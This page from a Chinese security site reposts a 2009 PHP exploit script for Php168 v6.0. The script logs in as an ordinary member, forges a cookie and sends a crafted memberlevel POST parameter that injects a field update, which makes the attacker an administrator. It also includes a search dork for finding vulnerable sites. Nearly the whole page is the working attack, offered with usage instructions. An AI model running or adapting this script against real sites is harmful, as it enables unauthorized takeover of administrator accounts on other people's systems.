Php168 v6 权限提升漏洞

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Php168 v6 权限提升漏洞

来源：http://www.wolvez.org 作者：Ryat 发布时间：2009-07-21

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 v6.0 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V6.0"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/ ryat 123456
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie)
    if (strpos(send(), 'puret_t') !== false)
        exit("Expoilt Success!\nYou Are Admin Now!\n");
    else
        exit("Exploit Failed!\n");
else
    exit("Exploit Failed!\n");

function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        $cookie[1] .= ';USR='.rands()."\t31\t\t";
        $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

        $message = "POST ".$path."member/homepage.php?uid=$cookie[2]  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";

        $message = "POST ".$path."do/login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告